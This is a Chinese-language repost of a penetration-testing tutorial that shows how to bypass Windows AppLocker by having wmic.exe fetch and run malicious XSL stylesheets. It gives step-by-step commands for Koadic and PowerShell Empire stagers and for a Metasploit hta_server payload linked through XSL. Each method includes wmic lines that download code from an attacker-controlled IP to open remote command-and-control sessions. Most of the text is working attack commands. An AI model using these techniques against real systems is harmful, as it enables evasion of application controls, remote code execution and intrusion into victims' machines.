這篇文章的目的是演示將AppLocker旁路列入白名單的最常見和最熟悉的技術,眾所周知,出于安全原因,系統管理員添加了組策略來限制本地用戶執行應用程式,在上一篇文章中,我們討論了“ Windows Applocker策略-入門指南 ”,因為它們定義了應用程式控制策略的AppLocker規則以及如何使用它們,但是今天,您將學習如何使用wmic.exe繞過Applocker策略,
表中的內容
Wmic.exe簡介
開發技術
- Koadic
- Powershell Empire
- 在XSL代碼中鏈接hta
Wmic.exe
WMIC實用程式是一種Microsoft工具,提供了WMI命令列界面,該界面用于本地和遠程計算機的各種管理功能,還用于WMIC查詢,例如系統設定,停止行程以及在本地或遠程運行腳本,因此,它可以呼叫XSL腳本(可擴展樣式表語言),
開發技術
Koadic
我們將在koadic的幫助下生成一個惡意XSL檔案,koadic是一個與Metasploit和Powershell Empire非常相似的命令和控制工具,
要了解koadic的作業原理,請從此處閱讀我們的文章:https : //www.hackingarticles.in/koadic-com-command-control-framework/
安裝完成后,您可以運行 ./koadic 檔案來啟動koadic,并通過運行以下命令并設定SRVHOST來啟動staged / js / wmic stager,并設定stager應該將其作為主目錄,
use stager/js/wmic
set SRVHOST 192.168.1.107
run
執行以下WMIC命令以從遠程服務器下載并運行惡意XSL檔案:
wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl"
一旦惡意XSL檔案將在目標計算機上執行,您將擁有與Metasploit一樣的Zombie連接,
PowerShell Empire
對于我們的wmic Attack的下一種方法,我們將使用Empire,Empire是一個開發后的框架,到目前為止,我們已經將xsl釘與Metasploit配對,但是在這種方法中,我們將使用empire框架,它僅僅是基于python的PowerShell Windows代理,因此非常有用,Empire是由@ harmj0y,@ sixdub,@ enigma0x3,rvrsh3ll,@ killswitch_gui和@xorrior開發的,您可以從此處下載此框架
要獲得《Empire》的基本指南,請訪問我們介紹帝國的文章:
https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/
empire框架啟動后,鍵入listener來檢查是否有任何活動的監聽器,正如您在下圖中所看到的,沒有活動的偵聽器,所以要設定一個監聽器型別:
listeners
uselistner http
set Host http://192.168.1.107
execute
使用以上命令,您將擁有一個活動的偵聽器,鍵入回來以退出偵聽器,以便您可以啟動PowerShell,
對于wmic攻擊,我們將使用舞臺游戲,empire中的登臺者是一段代碼,可讓我們的惡意代碼通過受感染主機上的代理運行,因此,對于這種型別:
usestager windows/launcher_xsl
set Listener http
execute
Usestager將創建一個惡意代碼檔案,該檔案將保存在名為launcher.xsl的/ tmp中,
我們已經使用python HTTP服務器在受害者的機器內傳輸此檔案
一旦檔案運行,我們將在偵聽器上得到結果,通過鍵入以下命令在受害者計算機上運行檔案:
wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl"
要查看是否有任何會話打開,請鍵入“ agents”,這樣做將為您顯示會話名稱,要訪問該會話,請輸入:
interact Z639YHPA
sysinfo
在XSL代碼中鏈接hta
眾所周知,wmic可以遠程執行任何檔案或腳本,因此我們將在XSL代碼內鏈接一個hta檔案,XSL檔案將包含一個鏈接,該鏈接用于通過mshta.exe下載并執行惡意的hta檔案,該檔案由wmic正式觸發,
因此,讓我們在Metasploit的幫助下生成一個hta檔案:
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit
現在,復制URL并將其放置在XSL代碼中,因為它們具有執行Microsoft語言腳本的能力,
然后,我們創建了一個“ payload.xsl”檔案,您可以從此鏈接 獲取幫助以撰寫XSL代碼,然后放置hta檔案的鏈接,如下所示,
現在,我們再次需要通過wmic.exe在以下命令的幫助下執行XSL檔案:
wmic os get /FORMAT:"http://192.168.1.109/payload.xsl"
執行以上命令后,您將打開一個會話,要訪問會話,請輸入:
sessions 1
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/135439.html
標籤:其他